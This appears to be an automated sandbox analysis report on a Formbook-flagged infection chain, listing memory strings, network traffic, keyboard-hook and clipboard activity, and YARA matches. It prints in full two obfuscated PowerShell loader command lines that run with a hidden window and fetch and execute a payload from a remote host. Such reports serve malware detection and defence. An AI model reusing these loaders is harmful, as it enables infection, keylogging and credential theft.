              Source: wab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2541165592.0000000002BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000B.00000002.3437805432.00000000226E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000012.00000002.2541165592.0000000002BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
              Source: wab.exe, 0000000B.00000002.3437805432.00000000226E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: powershell.exe, 00000006.00000002.2505588191.00000000072DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsof.
              Source: wab.exe, 00000010.00000002.2560201870.0000000000164000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000003.00000002.2579735465.0000024A428C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2503089959.00000000048D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3321380834.0000000004B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.2579735465.0000024A43B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: wab.exe, 00000010.00000002.2560964411.00000000004B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 00000010.00000003.2559759169.0000000000729000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2561259640.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_autho
              Source: wab.exe, 00000010.00000002.2560964411.00000000004B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 00000010.00000003.2559663310.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://
              Source: wab.exe, 00000010.00000002.2560964411.00000000004B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000003.00000002.2669451040.0000024A52932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.000000000593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000014.00000002.3321380834.0000000004C8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3321380834.0000000004F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro
              Source: powershell.exe, 00000014.00000002.3321380834.0000000004C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/Rutschebanes.qxdXR
              Source: wab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51555
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51553
              Source: unknownNetwork traffic detected: HTTP traffic on port 51555 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51553 -> 443
              Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.6:51553 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.6:51555 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041183A OpenClipboard,GetLastError,DeleteFileW,16_2_0041183A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,16_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,17_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,18_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7108, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\jiourhjs.dat, type: DROPPED

              System Summary

              barindex
              Source: amsi32_4972.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_6420.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 2084, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4972, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 504, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6747
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6771
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 6654
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6654
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6747Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6771Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 6654Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6654
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.n
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.nJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_050A635E Sleep,NtProtectVirtualMemory,11_2_050A635E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00401806 NtdllDefWindowProc_W,16_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004018C0 NtdllDefWindowProc_W,16_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004016FD NtdllDefWindowProc_A,17_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004017B7 NtdllDefWindowProc_A,17_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00402CAC NtdllDefWindowProc_A,18_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00402D66 NtdllDefWindowProc_A,18_2_00402D66
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A335C0 NtCreateMutant,LdrInitializeThunk,27_2_22A335C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A32C70 NtFreeVirtualMemory,LdrInitializeThunk,27_2_22A32C70
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A32DF0 NtQuerySystemInformation,LdrInitializeThunk,27_2_22A32DF0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A34340 NtSetContextThread,27_2_22A34340
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A33090 NtSetValueKey,27_2_22A33090
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A33010 NtOpenDirectoryObject,27_2_22A33010
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A34650 NtSuspendThread,27_2_22A34650
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_04082542 Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,27_2_04082542
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD3469B4C23_2_00007FFD3469B4C2
